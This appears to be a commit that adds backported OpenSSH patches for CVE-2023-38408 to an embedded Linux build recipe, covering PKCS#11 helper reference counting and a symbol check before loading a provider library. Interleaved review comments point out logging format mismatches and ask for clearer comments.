+This also implements reference counting of PKCS#11-hosted keys,
+allowing ssh-pkcs11-helper subprocesses to be automatically reaped
+when no remaining keys reference them. This fixes some bugs we have
+that make PKCS11 keys unusable after they have been deleted, e.g.
+https://bugzilla.mindrot.org/show_bug.cgi?id=3125
+
+ok markus@
+
+OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
+ 1 file changed, 282 insertions(+), 90 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 41114c7..4f3c6ed 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
++/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
+ /*
+ * Copyright (c) 2010 Markus Friedl. All rights reserved.
+ * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
+@@ -30,12 +30,11 @@
+ #include <string.h>
+ #include <unistd.h>
+ #include <errno.h>
++#include <limits.h>
+
+ #include <openssl/ecdsa.h>
+ #include <openssl/rsa.h>
+
+-#include "openbsd-compat/openssl-compat.h"
+-
+ #include "pathnames.h"
+ #include "xmalloc.h"
+ #include "sshbuf.h"
+@@ -47,18 +46,140 @@
+ #include "ssh-pkcs11.h"
+ #include "ssherr.h"
+
++#include "openbsd-compat/openssl-compat.h"
++
+ /* borrows code from sftp-server and ssh-agent */
+
+-static int fd = -1;
+-static pid_t pid = -1;
++/*
++ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
++ * by provider path or their unique EC/RSA METHOD pointers.
++ */
++struct helper {
++ char *path;
++ pid_t pid;
++ int fd;
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++ int (*rsa_finish)(RSA *rsa);
++ void (*ec_finish)(EC_KEY *key);
++ size_t nrsa, nec; /* number of active keys of each type */
++};
++static struct helper **helpers;
++static size_t nhelpers;
++
++static struct helper *
++helper_by_provider(const char *path)
++{
++ size_t i;
++
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == NULL || helpers[i]->path == NULL ||
++ helpers[i]->fd == -1)
++ continue;
++ if (strcmp(helpers[i]->path, path) == 0)
++ return helpers[i];
++ }
++ return NULL;
++}
++
++static struct helper *
++helper_by_rsa(const RSA *rsa)
++{
++ size_t i;
++ const RSA_METHOD *meth;
++
++ if ((meth = RSA_get_method(rsa)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static struct helper *
++helper_by_ec(const EC_KEY *ec)
++{
++ size_t i;
++ const EC_KEY_METHOD *meth;
++
++ if ((meth = EC_KEY_get_method(ec)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static void
++helper_free(struct helper *helper)
++{
++ size_t i;
++ int found = 0;
++
++ if (helper == NULL)
++ return;
++ if (helper->path == NULL || helper->ec_meth == NULL ||
++ helper->rsa_meth == NULL)
++ fatal("%s: inconsistent helper", __func__);
++ debug3("%s: free helper for provider %s", __func__ , helper->path);
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == helper) {
++ if (found)
++ fatal("%s: helper recorded more than once", __func__);
++ found = 1;
++ }
++ else if (found)
++ helpers[i - 1] = helpers[i];
++ }
++ if (found) {
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers - 1, sizeof(*helpers));
++ nhelpers--;
++ }
++ free(helper->path);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ RSA_meth_free(helper->rsa_meth);
++ free(helper);
++}
++
++static void
++helper_terminate(struct helper *helper)
++{
++ if (helper == NULL) {
++ return;
++ } else if (helper->fd == -1) {
++ debug3("%s: already terminated", __func__);
++ } else {
++ debug3("terminating helper for %s; "
++ "remaining %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ close(helper->fd);
++ /* XXX waitpid() */
++ helper->fd = -1;
++ helper->pid = -1;
++ }
++ /*
++ * Don't delete the helper entry until there are no remaining keys
++ * that reference it. Otherwise, any signing operation would call
++ * a free'd METHOD pointer and that would be bad.
++ */
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_free(helper);
++}
+
+ static void
+-send_msg(struct sshbuf *m)
++send_msg(int fd, struct sshbuf *m)
+ {
+ u_char buf[4];
+ size_t mlen = sshbuf_len(m);
+ int r;
+
++ if (fd == -1)
++ return;
+ POKE_U32(buf, mlen);
+ if (atomicio(vwrite, fd, buf, 4) != 4 ||
+ atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
+@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
+ }
+
+ static int
+-recv_msg(struct sshbuf *m)
++recv_msg(int fd, struct sshbuf *m)
+ {
+ u_int l, len;
+ u_char c, buf[1024];
+ int r;
+
++ sshbuf_reset(m);
++ if (fd == -1)
++ return 0; /* XXX */
+ if ((len = atomicio(read, fd, buf, 4)) != 4) {
+ error("read from helper failed: %u", len);
+ return (0); /* XXX */
+@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
+ if (len > 256 * 1024)
+ fatal("response too long: %u", len);
+ /* read len bytes into m */
+- sshbuf_reset(m);
+ while (len > 0) {
+ l = len;
+ if (l > sizeof(buf))
+@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
+ int
+ pkcs11_init(int interactive)
+ {
+- return (0);
++ return 0;
+ }
+
+ void
+ pkcs11_terminate(void)
+ {
+- if (fd >= 0)
+- close(fd);
++ size_t i;
++
++ debug3("%s: terminating %zu helpers", __func__, nhelpers);
++ for (i = 0; i < nhelpers; i++)
++ helper_terminate(helpers[i]);
+ }
+
+ static int
+@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, ret = -1;
++ struct helper *helper;
+
++ if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ if (padding != RSA_PKCS1_PADDING)
+ goto fail;
+ key = sshkey_new(KEY_UNSPEC);
+@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ (r = sshbuf_put_string(msg, from, flen)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ if (slen <= (size_t)RSA_size(rsa)) {
+@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
++static int
++rsa_finish(RSA *rsa)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_rsa(rsa)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
++ if (helper->rsa_finish != NULL)
++ helper->rsa_finish(rsa);
++ if (helper->nrsa == 0)
++ fatal("%s: RSA refcount error", __func__);
++ helper->nrsa--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++ return 1;
++}
++
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, nid;
++ struct helper *helper;
+
++ if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ nid = sshkey_ecdsa_key_to_nid(ec);
+ if (nid < 0) {
+ error("%s: couldn't get curve nid", __func__);
+@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ cp = signature;
+@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+-static RSA_METHOD *helper_rsa;
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
++static void
++ecdsa_do_finish(EC_KEY *ec)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_ec(ec)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
++ if (helper->ec_finish != NULL)
++ helper->ec_finish(ec);
++ if (helper->nec == 0)
++ fatal("%s: ECDSA refcount error", __func__);
++ helper->nec--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++}
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+-wrap_key(struct sshkey *k)
++wrap_key(struct helper *helper, struct sshkey *k)
+ {
+- if (k->type == KEY_RSA)
+- RSA_set_method(k->rsa, helper_rsa);
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- else if (k->type == KEY_ECDSA)
+- EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+- else
++ debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
++ if (k->type == KEY_RSA) {
++ RSA_set_method(k->rsa, helper->rsa_meth);
++ if (helper->nrsa++ >= INT_MAX)
++ fatal("%s: RSA refcount error", __func__);
++ } else if (k->type == KEY_ECDSA) {
++ EC_KEY_set_method(k->ecdsa, helper->ec_meth);
++ if (helper->nec++ >= INT_MAX)
++ fatal("%s: EC refcount error", __func__);
++ } else
+ fatal("%s: unknown key type", __func__);
++ k->flags |= SSHKEY_FLAG_EXT;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
+ }
+
+ static int
+-pkcs11_start_helper_methods(void)
++pkcs11_start_helper_methods(struct helper *helper)
+ {
+- if (helper_rsa != NULL)
+- return (0);
+-
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
++ int (*ec_init)(EC_KEY *key);
++ int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
++ int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
++ int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
++ int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
++ int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+- if (helper_ecdsa != NULL)
+- return (0);
+- helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
+- if (helper_ecdsa == NULL)
+- return (-1);
+- EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+- EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+-
+- if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++
++ if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
++ return -1;
++ EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
++ EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
++ EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
++ &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
++ EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
++ ec_copy, ec_set_group, ec_set_private, ec_set_public);
++
++ if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+- if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
+- !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
++ helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
++ if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
++ !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
++ !RSA_meth_set_finish(rsa_meth, rsa_finish))
+ fatal("%s: failed to prepare method", __func__);
+
+- return (0);
++ helper->ec_meth = ec_meth;
++ helper->rsa_meth = rsa_meth;
++ return 0;
+ }
+
+-static int
+-pkcs11_start_helper(void)
++static struct helper *
++pkcs11_start_helper(const char *path)
+ {
+ int pair[2];
+- char *helper, *verbosity = NULL;
+-
+- if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
+- verbosity = "-vvv";
+-
+- if (pkcs11_start_helper_methods() == -1) {
+- error("pkcs11_start_helper_methods failed");
+- return (-1);
+- }
++ char *prog, *verbosity = NULL;
++ struct helper *helper;
++ pid_t pid;
+
++ if (nhelpers >= INT_MAX)
++ fatal("%s: too many helpers", __func__);
++ debug3("%s: start helper for %s", __func__, path);
+ if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
+ error("socketpair: %s", strerror(errno));
+- return (-1);
++ return NULL;
++ }
++ helper = xcalloc(1, sizeof(*helper));
++ if (pkcs11_start_helper_methods(helper) == -1) {
++ error("pkcs11_start_helper_methods failed");
++ goto fail;
+ }
+ if ((pid = fork()) == -1) {
+ error("fork: %s", strerror(errno));
+- return (-1);
++ fail:
++ close(pair[0]);
++ close(pair[1]);
++ RSA_meth_free(helper->rsa_meth);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ free(helper);
++ return NULL;
+ } else if (pid == 0) {
+ if ((dup2(pair[1], STDIN_FILENO) == -1) ||
+ (dup2(pair[1], STDOUT_FILENO) == -1)) {
+@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
+ }
+ close(pair[0]);
+ close(pair[1]);
+- helper = getenv("SSH_PKCS11_HELPER");
+- if (helper == NULL || strlen(helper) == 0)
+- helper = _PATH_SSH_PKCS11_HELPER;
++ prog = getenv("SSH_PKCS11_HELPER");
++ if (prog == NULL || strlen(prog) == 0)
++ prog = _PATH_SSH_PKCS11_HELPER;
++ if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
++ verbosity = "-vvv";
+ debug("%s: starting %s %s", __func__, helper,
+ verbosity == NULL ? "" : verbosity);
+- execlp(helper, helper, verbosity, (char *)NULL);
+- fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
++ execlp(prog, prog, verbosity, (char *)NULL);
++ fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
+ _exit(1);
+ }
+ close(pair[1]);
+- fd = pair[0];
+- return (0);
++ helper->fd = pair[0];
++ helper->path = xstrdup(path);
++ helper->pid = pid;
++ debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
++ helper->path, helper->fd, (long)helper->pid);
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers + 1, sizeof(*helpers));
++ helpers[nhelpers++] = helper;
++ return helper;
+ }
+
+ int
+@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ size_t blen;
+ u_int nkeys, i;
+ struct sshbuf *msg;
++ struct helper *helper;
+
+- if (fd < 0 && pkcs11_start_helper() < 0)
+- return (-1);
++ if ((helper = helper_by_provider(name)) == NULL &&
++ (helper = pkcs11_start_helper(name)) == NULL)
++ return -1;
+
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ (r = sshbuf_put_cstring(msg, name)) != 0 ||
+ (r = sshbuf_put_cstring(msg, pin)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- type = recv_msg(msg);
++ type = recv_msg(helper->fd, msg);
+ if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
+ if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ __func__, ssh_err(r));
+ if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
+ fatal("%s: bad key: %s", __func__, ssh_err(r));
+- wrap_key(k);
++ wrap_key(helper, k);
+ (*keysp)[i] = k;
+ if (labelsp)
+ (*labelsp)[i] = label;
+@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ int
+ pkcs11_del_provider(char *name)
+ {
+- int r, ret = -1;
+- struct sshbuf *msg;
+-
+- if ((msg = sshbuf_new()) == NULL)
+- fatal("%s: sshbuf_new failed", __func__);
+- if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
+- (r = sshbuf_put_cstring(msg, name)) != 0 ||
+- (r = sshbuf_put_cstring(msg, "")) != 0)
+- fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
+- sshbuf_reset(msg);
+-
+- if (recv_msg(msg) == SSH_AGENT_SUCCESS)
+- ret = 0;
+- sshbuf_free(msg);
+- return (ret);
++ struct helper *helper;
++
++ /*
++ * ssh-agent deletes keys before calling this, so the helper entry
++ * should be gone before we get here.
++ */
++ debug3("%s: delete %s", __func__, name);
++ if ((helper = helper_by_provider(name)) != NULL)
++ helper_terminate(helper);
++ return 0;
+ }
+-
+ #endif /* ENABLE_PKCS11 */
+--
+2.41.0
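Review bot: Two log calls in this ssh-pkcs11-client.c backport pass arguments that no longer match their format strings. In helper_terminate(), `debug3("terminating helper for %s; "` is given `__func__` first but has no `%s: ` prefix, so `helper->path` is consumed by `%zu`; it should begin `debug3("%s: terminating helper for %s; "`. In the child branch of pkcs11_start_helper(), the unchanged line `debug("%s: starting %s %s", __func__, helper,` now hands the new `struct helper *` to `%s` because the program path was renamed to `prog`; it should pass `prog`. Separately, the patch drops the `OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW` guards in this file, so the EC_KEY_METHOD code is compiled unconditionally, which is fine only if the target OpenSSL always provides it, and I cannot confirm that from here.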
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
+From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:02:27 +0000
+Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
+ symbols
+
+This checks via nlist(3) that candidate provider libraries contain one
+of the symbols that we will require prior to dlopen(), which can cause
+a number of side effects, including execution of constructors.
+
+Feedback deraadt; ok markus
+
+OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ misc.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
+ misc.h | 1 +
+ ssh-pkcs11.c | 4 +++
+ ssh-sk.c | 6 ++--
+ 4 files changed, 86 insertions(+), 2 deletions(-)
+
+diff --git a/misc.c b/misc.c
+index 3a31d5c..8a107e4 100644
+--- a/misc.c
++++ b/misc.c
+@@ -28,6 +28,7 @@
+
+ #include <sys/types.h>
+ #include <sys/ioctl.h>
++#include <sys/mman.h>
+ #include <sys/socket.h>
+ #include <sys/stat.h>
+ #include <sys/time.h>
+@@ -41,6 +42,9 @@
+ #ifdef HAVE_POLL_H
+ #include <poll.h>
+ #endif
++#ifdef HAVE_NLIST_H
++#include <nlist.h>
++#endif
+ #include <signal.h>
+ #include <stdarg.h>
+ #include <stdio.h>
+@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
+ }
+ return osa.sa_handler;
+ }
++
++
++/*
++ * Returns zero if the library at 'path' contains symbol 's', nonzero
++ * otherwise.
++ */
++int
++lib_contains_symbol(const char *path, const char *s)
++{
++#ifdef HAVE_NLIST_H
++ struct nlist nl[2];
++ int ret = -1, r;
++
++ memset(nl, 0, sizeof(nl));
++ nl[0].n_name = xstrdup(s);
++ nl[1].n_name = NULL;
++ if ((r = nlist(path, nl)) == -1) {
++ error("%s: nlist failed for %s", __func__, path);
++ goto out;
++ }
++ if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
++ error("%s: library %s does not contain symbol %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ free(nl[0].n_name);
++ return ret;
++#else /* HAVE_NLIST_H */
++ int fd, ret = -1;
++ struct stat st;
++ void *m = NULL;
++ size_t sz = 0;
++
++ memset(&st, 0, sizeof(st));
++ if ((fd = open(path, O_RDONLY)) < 0) {
++ error("%s: open %s: %s", __func__, path, strerror(errno));
++ return -1;
++ }
++ if (fstat(fd, &st) != 0) {
++ error("%s: fstat %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (!S_ISREG(st.st_mode)) {
++ error("%s: %s is not a regular file", __func__, path);
++ goto out;
++ }
++ if (st.st_size < 0 ||
++ (size_t)st.st_size < strlen(s) ||
++ st.st_size >= INT_MAX/2) {
++ error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
++ goto out;
++ }
++ sz = (size_t)st.st_size;
++ if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
++ m == NULL) {
++ error("%s: mmap %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (memmem(m, sz, s, strlen(s)) == NULL) {
++ error("%s: %s does not contain expected string %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ if (m != NULL && m != MAP_FAILED)
++ munmap(m, sz);
++ close(fd);
++ return ret;
++#endif /* HAVE_NLIST_H */
++}
+diff --git a/misc.h b/misc.h
+index 4a05db2..3f9f4db 100644
+--- a/misc.h
++++ b/misc.h
+@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
+ int parse_absolute_time(const char *, uint64_t *);
+ void format_absolute_time(uint64_t, char *, size_t);
+ int path_absolute(const char *);
++int lib_contains_symbol(const char *, const char *);
+
+ void sock_set_v6only(int);
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index b56a41b..639a6f7 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ __func__, provider_id);
+ goto fail;
+ }
++ if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
++ error("provider %s is not a PKCS11 library", provider_id);
++ goto fail;
++ }
+ /* open shared pkcs11-library */
+ if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
+ error("dlopen %s failed: %s", provider_id, dlerror());
+diff --git a/ssh-sk.c b/ssh-sk.c
+index 5ff9381..9df12cc 100644
+--- a/ssh-sk.c
++++ b/ssh-sk.c
+@@ -119,10 +119,12 @@ sshsk_open(const char *path)
+ #endif
+ return ret;
+ }
+- if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
+- error("Provider \"%s\" dlopen failed: %s", path, dlerror());
++ if (lib_contains_symbol(path, "sk_api_version") != 0) {
++ error("provider %s is not an OpenSSH FIDO library", path);
+ goto fail;
+ }
++ if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
++ fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
+ if ((ret->sk_api_version = dlsym(ret->dlhandle,
+ "sk_api_version")) == NULL) {
+ error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
+--
+2.41.0
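Review bot: The header comment on lib_contains_symbol() in misc.c promises more than the `#else` branch delivers: without nlist.h it only checks with memmem() that the name occurs as bytes somewhere in the file, not that the library exports the symbol. The diffstat touches no configure input, so unless another patch in the series defines HAVE_NLIST_H, this fallback is presumably the branch that gets built. I would extend the comment with something like `This is a best-effort filter applied before dlopen(); dlopen() opens the path again, so it is not an integrity check on the file that gets loaded.` so that the new callers in ssh-pkcs11.c and ssh-sk.c are not read as a trust decision.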
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
+From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:55:53 +0000
+Subject: [PATCH 04/12] upstream: terminate process if requested to load a
+ PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
+
+OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index 639a6f7..7530acc 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ error("dlopen %s failed: %s", provider_id, dlerror());
+ goto fail;
+ }
+- if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
+- error("dlsym(C_GetFunctionList) failed: %s", dlerror());
+- goto fail;
+- }
++ if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
++ fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
+ p = xcalloc(1, sizeof(*p));
+ p->name = xstrdup(provider_id);
+ p->handle = handle;
+--
+2.41.0
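Review bot: The switch from error()/goto fail to fatal() in pkcs11_register_provider() needs a comment, because the reason is not visible at the call site. By this point dlopen() has already run the library's constructors, so a missing C_GetFunctionList means code that is not a provider is mapped into the process. A line above the dlsym() call such as `/* not a PKCS#11 provider but already loaded: do not keep running with it mapped */` would do. ssh-pkcs11.c may be linked into programs other than the helper, in which case fatal() ends that program too, so it is worth confirming this is acceptable for each of them. The function continues outside the hunk.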
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
+From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 May 2020 01:26:58 +0000
